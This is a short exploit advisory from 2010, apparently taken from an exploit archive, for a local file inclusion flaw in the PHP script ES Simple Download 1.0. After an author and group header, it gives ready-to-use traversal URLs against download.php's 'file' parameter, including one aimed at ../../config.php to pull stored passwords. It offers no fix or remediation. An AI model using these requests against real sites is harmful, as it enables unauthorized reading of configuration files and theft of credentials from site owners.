17 lines
No EOL
876 B
Text
17 lines
No EOL
876 B
Text
----------------------------Information------------------------------------------------
|
|
+Name : ES Simple Download v 1.0. Local File Exclusion/LFI
|
|
+Autor : Kazza
|
|
+email : kazzamagic@list.ru
|
|
+Date : 09.09.2010
|
|
+Script : ES Simple Download v 1.0.
|
|
+Price : Freeware
|
|
+Language :PHP
|
|
+Discovered by Kazza
|
|
+Security Group : -GST-German Security Team-
|
|
+And all Friends Sites : http://md5cracker.tk - http://gulli.com - http://free-hack.com
|
|
|
|
----------------------------Vulnerability-----------------------------------------------
|
|
+Download : www.energyscripts.com/projects/essdownload/essdownload1.0.zip
|
|
+Vulnerability : www.your script/download.php?PHPSESSID="Your Senssid"&file=../*****
|
|
+Password Exploitable : www.your script/download.php?PHPSESSID="Your Senssid"&file=../../config.php
|
|
----------------------------------------------------------------------------------------- |